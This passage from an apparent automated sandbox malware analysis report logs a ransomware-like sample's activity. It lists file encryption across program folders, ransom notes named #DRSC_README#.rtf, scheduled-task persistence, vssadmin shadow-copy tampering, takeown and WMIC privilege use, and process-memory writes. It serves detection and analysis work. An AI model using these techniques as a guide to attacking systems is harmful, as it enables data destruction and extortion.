710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\et.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 532 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1500 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1228 V779npJ764.exe 1228 V779npJ764.exe 1228 V779npJ764.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1228 V779npJ764.exe -
Suspicious use of AdjustPrivilegeToken 96 IoCs
description pid Process Token: SeDebugPrivilege 1228 V779npJ764.exe Token: SeLoadDriverPrivilege 1228 V779npJ764.exe Token: SeTakeOwnershipPrivilege 776 takeown.exe Token: SeTakeOwnershipPrivilege 1496 takeown.exe Token: SeTakeOwnershipPrivilege 1032 takeown.exe Token: SeTakeOwnershipPrivilege 712 takeown.exe Token: SeBackupPrivilege 1056 vssvc.exe Token: SeRestorePrivilege 1056 vssvc.exe Token: SeAuditPrivilege 1056 vssvc.exe Token: SeTakeOwnershipPrivilege 1372 takeown.exe Token: SeTakeOwnershipPrivilege 904 takeown.exe Token: SeTakeOwnershipPrivilege 972 takeown.exe Token: SeTakeOwnershipPrivilege 320 takeown.exe Token: SeIncreaseQuotaPrivilege 568 WMIC.exe Token: SeSecurityPrivilege 568 WMIC.exe Token: SeTakeOwnershipPrivilege 568 WMIC.exe Token: SeLoadDriverPrivilege 568 WMIC.exe Token: SeSystemProfilePrivilege 568 WMIC.exe Token: SeSystemtimePrivilege 568 WMIC.exe Token: SeProfSingleProcessPrivilege 568 WMIC.exe Token: SeIncBasePriorityPrivilege 568 WMIC.exe Token: SeCreatePagefilePrivilege 568 WMIC.exe Token: SeBackupPrivilege 568 WMIC.exe Token: SeRestorePrivilege 568 WMIC.exe Token: SeShutdownPrivilege 568 WMIC.exe Token: SeDebugPrivilege 568 WMIC.exe Token: SeSystemEnvironmentPrivilege 568 WMIC.exe Token: SeRemoteShutdownPrivilege 568 WMIC.exe Token: SeUndockPrivilege 568 WMIC.exe Token: SeManageVolumePrivilege 568 WMIC.exe Token: 33 568 WMIC.exe Token: 34 568 WMIC.exe Token: 35 568 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 takeown.exe Token: SeTakeOwnershipPrivilege 472 takeown.exe Token: SeIncreaseQuotaPrivilege 568 WMIC.exe Token: SeSecurityPrivilege 568 WMIC.exe Token: SeTakeOwnershipPrivilege 568 WMIC.exe Token: SeLoadDriverPrivilege 568 WMIC.exe Token: SeSystemProfilePrivilege 568 WMIC.exe Token: SeSystemtimePrivilege 568 WMIC.exe Token: SeProfSingleProcessPrivilege 568 WMIC.exe Token: SeIncBasePriorityPrivilege 568 WMIC.exe Token: SeCreatePagefilePrivilege 568 WMIC.exe Token: SeBackupPrivilege 568 WMIC.exe Token: SeRestorePrivilege 568 WMIC.exe Token: SeShutdownPrivilege 568 WMIC.exe Token: SeDebugPrivilege 568 WMIC.exe Token: SeSystemEnvironmentPrivilege 568 WMIC.exe Token: SeRemoteShutdownPrivilege 568 WMIC.exe Token: SeUndockPrivilege 568 WMIC.exe Token: SeManageVolumePrivilege 568 WMIC.exe Token: 33 568 WMIC.exe Token: 34 568 WMIC.exe Token: 35 568 WMIC.exe Token: SeTakeOwnershipPrivilege 1792 takeown.exe Token: SeTakeOwnershipPrivilege 220 takeown.exe Token: SeTakeOwnershipPrivilege 204 takeown.exe Token: SeTakeOwnershipPrivilege 1808 takeown.exe Token: SeTakeOwnershipPrivilege 1476 takeown.exe Token: SeTakeOwnershipPrivilege 1276 takeown.exe Token: SeTakeOwnershipPrivilege 1120 takeown.exe Token: SeTakeOwnershipPrivilege 1052 takeown.exe Token: SeTakeOwnershipPrivilege 864 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 620 takeown.exe Token: SeTakeOwnershipPrivilege 1076 takeown.exe Token: SeTakeOwnershipPrivilege 1008 takeown.exe Token: SeTakeOwnershipPrivilege 1480 takeown.exe Token: SeTakeOwnershipPrivilege 1808 takeown.exe Token: SeTakeOwnershipPrivilege 1800 takeown.exe Token: SeTakeOwnershipPrivilege 896 takeown.exe Token: SeTakeOwnershipPrivilege 960 takeown.exe Token: SeTakeOwnershipPrivilege 204 takeown.exe Token: SeTakeOwnershipPrivilege 940 takeown.exe Token: SeTakeOwnershipPrivilege 1076 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1212 takeown.exe Token: SeTakeOwnershipPrivilege 1372 takeown.exe Token: SeTakeOwnershipPrivilege 1128 takeown.exe Token: SeTakeOwnershipPrivilege 232 takeown.exe Token: SeTakeOwnershipPrivilege 316 takeown.exe Token: SeTakeOwnershipPrivilege 1676 takeown.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 864 takeown.exe Token: SeTakeOwnershipPrivilege 856 takeown.exe Token: SeTakeOwnershipPrivilege 864 takeown.exe Token: SeTakeOwnershipPrivilege 856 takeown.exe Token: SeTakeOwnershipPrivilege 220 takeown.exe Token: SeTakeOwnershipPrivilege 776 takeown.exe Token: SeTakeOwnershipPrivilege 1656 takeown.exe Token: SeTakeOwnershipPrivilege 1212 takeown.exe Token: SeTakeOwnershipPrivilege 1656 takeown.exe Token: SeTakeOwnershipPrivilege 1128 takeown.exe Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeTakeOwnershipPrivilege 1868 takeown.exe -
Suspicious use of WriteProcessMemory 4362 IoCs
description pid Process procid_target PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 26 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 26 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 26 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 26 PID 1096 wrote to memory of 1488 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 28 PID 1096 wrote to memory of 1488 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 28 PID 1096 wrote to memory of 1488 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 28 PID 1096 wrote to memory of 1488 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 28 PID 1096 wrote to memory of 1212 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 33 PID 1096 wrote to memory of 1212 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 33 PID 1096 wrote to memory of 1212 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 33 PID 1096 wrote to memory of 1212 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 33 PID 1096 wrote to memory of 1868 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 34 PID 1096 wrote to memory of 1868 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 34 PID 1096 wrote to memory of 1868 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 34 PID 1096 wrote to memory of 1868 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 34 PID 1212 wrote to memory of 1040 1212 cmd.exe 37 PID 1212 wrote to memory of 1040 1212 cmd.exe 37 PID 1212 wrote to memory of 1040 1212 cmd.exe 37 PID 1212 wrote to memory of 1040 1212 cmd.exe 37 PID 1868 wrote to memory of 1052 1868 cmd.exe 38 PID 1868 wrote to memory of 1052 1868 cmd.exe 38 PID 1868 wrote to memory of 1052 1868 cmd.exe 38 PID 1868 wrote to memory of 1052 1868 cmd.exe 38 PID 1212 wrote to memory of 1576 1212 cmd.exe 39 PID 1212 wrote to memory of 1576 1212 cmd.exe 39 PID 1212 wrote to memory of 1576 1212 cmd.exe 39 PID 1212 wrote to memory of 1576 1212 cmd.exe 39 PID 1212 wrote to memory of 1516 1212 cmd.exe 40 PID 1212 wrote to memory of 1516 1212 cmd.exe 40 PID 1212 wrote to memory of 1516 1212 cmd.exe 40 PID 1212 wrote to memory of 1516 1212 cmd.exe 40 PID 1096 wrote to memory of 1132 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 41 PID 1096 wrote to memory of 1132 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 41 PID 1096 wrote to memory of 1132 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 41 PID 1096 wrote to memory of 1132 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 41 PID 1132 wrote to memory of 1944 1132 cmd.exe 43 PID 1132 wrote to memory of 1944 1132 cmd.exe 43 PID 1132 wrote to memory of 1944 1132 cmd.exe 43 PID 1132 wrote to memory of 1944 1132 cmd.exe 43 PID 1132 wrote to memory of 864 1132 cmd.exe 45 PID 1132 wrote to memory of 864 1132 cmd.exe 45 PID 1132 wrote to memory of 864 1132 cmd.exe 45 PID 1132 wrote to memory of 864 1132 cmd.exe 45 PID 1132 wrote to memory of 528 1132 cmd.exe 46 PID 1132 wrote to memory of 528 1132 cmd.exe 46 PID 1132 wrote to memory of 528 1132 cmd.exe 46 PID 1132 wrote to memory of 528 1132 cmd.exe 46 PID 528 wrote to memory of 560 528 cmd.exe 47 PID 528 wrote to memory of 560 528 cmd.exe 47 PID 528 wrote to memory of 560 528 cmd.exe 47 PID 528 wrote to memory of 560 528 cmd.exe 47 PID 560 wrote to memory of 1228 560 V779npJ7.exe 48 PID 560 wrote to memory of 1228 560 V779npJ7.exe 48 PID 560 wrote to memory of 1228 560 V779npJ7.exe 48 PID 560 wrote to memory of 1228 560 V779npJ7.exe 48 PID 1052 wrote to memory of 548 1052 wscript.exe 49 PID 1052 wrote to memory of 548 1052 wscript.exe 49 PID 1052 wrote to memory of 548 1052 wscript.exe 49 PID 1052 wrote to memory of 548 1052 wscript.exe 49 PID 548 wrote to memory of 532 548 cmd.exe 51 PID 548 wrote to memory of 532 548 cmd.exe 51 PID 548 wrote to memory of 532 548 cmd.exe 51 PID 548 wrote to memory of 532 548 cmd.exe 51 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 52 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 52 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 52 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 52 PID 856 wrote to memory of 828 856 cmd.exe 54 PID 856 wrote to memory of 828 856 cmd.exe 54 PID 856 wrote to memory of 828 856 cmd.exe 54 PID 856 wrote to memory of 828 856 cmd.exe 54 PID 856 wrote to memory of 1488 856 cmd.exe 55 PID 856 wrote to memory of 1488 856 cmd.exe 55 PID 856 wrote to memory of 1488 856 cmd.exe 55 PID 856 wrote to memory of 1488 856 cmd.exe 55 PID 856 wrote to memory of 672 856 cmd.exe 56 PID 856 wrote to memory of 672 856 cmd.exe 56 PID 856 wrote to memory of 672 856 cmd.exe 56 PID 856 wrote to memory of 672 856 cmd.exe 56 PID 672 wrote to memory of 1092 672 cmd.exe 57 PID 672 wrote to memory of 1092 672 cmd.exe 57 PID 672 wrote to memory of 1092 672 cmd.exe 57 PID 672 wrote to memory of 1092 672 cmd.exe 57 PID 856 wrote to memory of 1040 856 cmd.exe 58 PID 856 wrote to memory of 1040 856 cmd.exe 58 PID 856 wrote to memory of 1040 856 cmd.exe 58 PID 856 wrote to memory of 1040 856 cmd.exe 58 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 59 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 59 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 59 PID 1096 wrote to memory of 1036 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 59 PID 1036 wrote to memory of 1656 1036 cmd.exe 61 PID 1036 wrote to memory of 1656 1036 cmd.exe 61 PID 1036 wrote to memory of 1656 1036 cmd.exe 61 PID 1036 wrote to memory of 1656 1036 cmd.exe 61 PID 1036 wrote to memory of 796 1036 cmd.exe 62 PID 1036 wrote to memory of 796 1036 cmd.exe 62 PID 1036 wrote to memory of 796 1036 cmd.exe 62 PID 1036 wrote to memory of 796 1036 cmd.exe 62 PID 1036 wrote to memory of 1784 1036 cmd.exe 63 PID 1036 wrote to memory of 1784 1036 cmd.exe 63 PID 1036 wrote to memory of 1784 1036 cmd.exe 63 PID 1036 wrote to memory of 1784 1036 cmd.exe 63 PID 1784 wrote to memory of 1876 1784 cmd.exe 64 PID 1784 wrote to memory of 1876 1784 cmd.exe 64 PID 1784 wrote to memory of 1876 1784 cmd.exe 64 PID 1784 wrote to memory of 1876 1784 cmd.exe 64 PID 1036 wrote to memory of 1956 1036 cmd.exe 65 PID 1036 wrote to memory of 1956 1036 cmd.exe 65 PID 1036 wrote to memory of 1956 1036 cmd.exe 65 PID 1036 wrote to memory of 1956 1036 cmd.exe 65 PID 1096 wrote to memory of 568 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 66 PID 1096 wrote to memory of 568 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 66 PID 1096 wrote to memory of 568 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 66 PID 1096 wrote to memory of 568 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 66 PID 568 wrote to memory of 896 568 cmd.exe 68 PID 568 wrote to memory of 896 568 cmd.exe 68 PID 568 wrote to memory of 896 568 cmd.exe 68 PID 568 wrote to memory of 896 568 cmd.exe 68 PID 568 wrote to memory of 1484 568 cmd.exe 69 PID 568 wrote to memory of 1484 568 cmd.exe 69 PID 568 wrote to memory of 1484 568 cmd.exe 69 PID 568 wrote to memory of 1484 568 cmd.exe 69 PID 568 wrote to memory of 672 568 cmd.exe 70 PID 568 wrote to memory of 672 568 cmd.exe 70 PID 568 wrote to memory of 672 568 cmd.exe 70 PID 568 wrote to memory of 672 568 cmd.exe 70 PID 672 wrote to memory of 856 672 cmd.exe 71 PID 672 wrote to memory of 856 672 cmd.exe 71 PID 672 wrote to memory of 856 672 cmd.exe 71 PID 672 wrote to memory of 856 672 cmd.exe 71 PID 568 wrote to memory of 1744 568 cmd.exe 72 PID 568 wrote to memory of 1744 568 cmd.exe 72 PID 568 wrote to memory of 1744 568 cmd.exe 72 PID 568 wrote to memory of 1744 568 cmd.exe 72 PID 1096 wrote to memory of 1848 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 1096 wrote to memory of 1848 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 1096 wrote to memory of 1848 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 1096 wrote to memory of 1848 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 73 PID 1848 wrote to memory of 1560 1848 cmd.exe 75 PID 1848 wrote to memory of 1560 1848 cmd.exe 75 PID 1848 wrote to memory of 1560 1848 cmd.exe 75 PID 1848 wrote to memory of 1560 1848 cmd.exe 75 PID 1848 wrote to memory of 1500 1848 cmd.exe 76 PID 1848 wrote to memory of 1500 1848 cmd.exe 76 PID 1848 wrote to memory of 1500 1848 cmd.exe 76 PID 1848 wrote to memory of 1500 1848 cmd.exe 76 PID 1052 wrote to memory of 1076 1052 wscript.exe 77 PID 1052 wrote to memory of 1076 1052 wscript.exe 77 PID 1052 wrote to memory of 1076 1052 wscript.exe 77 PID 1052 wrote to memory of 1076 1052 wscript.exe 77 PID 1848 wrote to memory of 1956 1848 cmd.exe 78 PID 1848 wrote to memory of 1956 1848 cmd.exe 78 PID 1848 wrote to memory of 1956 1848 cmd.exe 78 PID 1848 wrote to memory of 1956 1848 cmd.exe 78 PID 1956 wrote to memory of 1212 1956 cmd.exe 80 PID 1956 wrote to memory of 1212 1956 cmd.exe 80 PID 1956 wrote to memory of 1212 1956 cmd.exe 80 PID 1956 wrote to memory of 1212 1956 cmd.exe 80 PID 1076 wrote to memory of 1372 1076 cmd.exe 81 PID 1076 wrote to memory of 1372 1076 cmd.exe 81 PID 1076 wrote to memory of 1372 1076 cmd.exe 81 PID 1076 wrote to memory of 1372 1076 cmd.exe 81 PID 1848 wrote to memory of 2004 1848 cmd.exe 82 PID 1848 wrote to memory of 2004 1848 cmd.exe 82 PID 1848 wrote to memory of 2004 1848 cmd.exe 82 PID 1848 wrote to memory of 2004 1848 cmd.exe 82 PID 1096 wrote to memory of 1668 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 83 PID 1096 wrote to memory of 1668 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 83 PID 1096 wrote to memory of 1668 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 83 PID 1096 wrote to memory of 1668 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 83 PID 1668 wrote to memory of 1484 1668 cmd.exe 86 PID 1668 wrote to memory of 1484 1668 cmd.exe 86 PID 1668 wrote to memory of 1484 1668 cmd.exe 86 PID 1668 wrote to memory of 1484 1668 cmd.exe 86 PID 1668 wrote to memory of 940 1668 cmd.exe 87 PID 1668 wrote to memory of 940 1668 cmd.exe 87 PID 1668 wrote to memory of 940 1668 cmd.exe 87 PID 1668 wrote to memory of 940 1668 cmd.exe 87 PID 1668 wrote to memory of 360 1668 cmd.exe 88 PID 1668 wrote to memory of 360 1668 cmd.exe 88 PID 1668 wrote to memory of 360 1668 cmd.exe 88 PID 1668 wrote to memory of 360 1668 cmd.exe 88 PID 360 wrote to memory of 672 360 cmd.exe 89 PID 360 wrote to memory of 672 360 cmd.exe 89 PID 360 wrote to memory of 672 360 cmd.exe 89 PID 360 wrote to memory of 672 360 cmd.exe 89 PID 1668 wrote to memory of 1152 1668 cmd.exe 90 PID 1668 wrote to memory of 1152 1668 cmd.exe 90 PID 1668 wrote to memory of 1152 1668 cmd.exe 90 PID 1668 wrote to memory of 1152 1668 cmd.exe 90 PID 1488 wrote to memory of 1584 1488 taskeng.exe 91 PID 1488 wrote to memory of 1584 1488 taskeng.exe 91 PID 1488 wrote to memory of 1584 1488 taskeng.exe 91 PID 1096 wrote to memory of 1392 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 92 PID 1096 wrote to memory of 1392 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 92 PID 1096 wrote to memory of 1392 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 92 PID 1096 wrote to memory of 1392 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 92 PID 1392 wrote to memory of 712 1392 cmd.exe 94 PID 1392 wrote to memory of 712 1392 cmd.exe 94 PID 1392 wrote to memory of 712 1392 cmd.exe 94 PID 1392 wrote to memory of 712 1392 cmd.exe 94 PID 1392 wrote to memory of 1876 1392 cmd.exe 95 PID 1392 wrote to memory of 1876 1392 cmd.exe 95 PID 1392 wrote to memory of 1876 1392 cmd.exe 95 PID 1392 wrote to memory of 1876 1392 cmd.exe 95 PID 1392 wrote to memory of 1740 1392 cmd.exe 96 PID 1392 wrote to memory of 1740 1392 cmd.exe 96 PID 1392 wrote to memory of 1740 1392 cmd.exe 96 PID 1392 wrote to memory of 1740 1392 cmd.exe 96 PID 1740 wrote to memory of 608 1740 cmd.exe 97 PID 1740 wrote to memory of 608 1740 cmd.exe 97 PID 1740 wrote to memory of 608 1740 cmd.exe 97 PID 1740 wrote to memory of 608 1740 cmd.exe 97 PID 1392 wrote to memory of 1056 1392 cmd.exe 98 PID 1392 wrote to memory of 1056 1392 cmd.exe 98 PID 1392 wrote to memory of 1056 1392 cmd.exe 98 PID 1392 wrote to memory of 1056 1392 cmd.exe 98 PID 1096 wrote to memory of 1676 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 99 PID 1096 wrote to memory of 1676 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 99 PID 1096 wrote to memory of 1676 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 99 PID 1096 wrote to memory of 1676 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 99 PID 1676 wrote to memory of 2004 1676 cmd.exe 101 PID 1676 wrote to memory of 2004 1676 cmd.exe 101 PID 1676 wrote to memory of 2004 1676 cmd.exe 101 PID 1676 wrote to memory of 2004 1676 cmd.exe 101 PID 1676 wrote to memory of 796 1676 cmd.exe 102 PID 1676 wrote to memory of 796 1676 cmd.exe 102 PID 1676 wrote to memory of 796 1676 cmd.exe 102 PID 1676 wrote to memory of 796 1676 cmd.exe 102 PID 1676 wrote to memory of 1796 1676 cmd.exe 103 PID 1676 wrote to memory of 1796 1676 cmd.exe 103 PID 1676 wrote to memory of 1796 1676 cmd.exe 103 PID 1676 wrote to memory of 1796 1676 cmd.exe 103 PID 1796 wrote to memory of 1372 1796 cmd.exe 104 PID 1796 wrote to memory of 1372 1796 cmd.exe 104 PID 1796 wrote to memory of 1372 1796 cmd.exe 104 PID 1796 wrote to memory of 1372 1796 cmd.exe 104 PID 1676 wrote to memory of 864 1676 cmd.exe 105 PID 1676 wrote to memory of 864 1676 cmd.exe 105 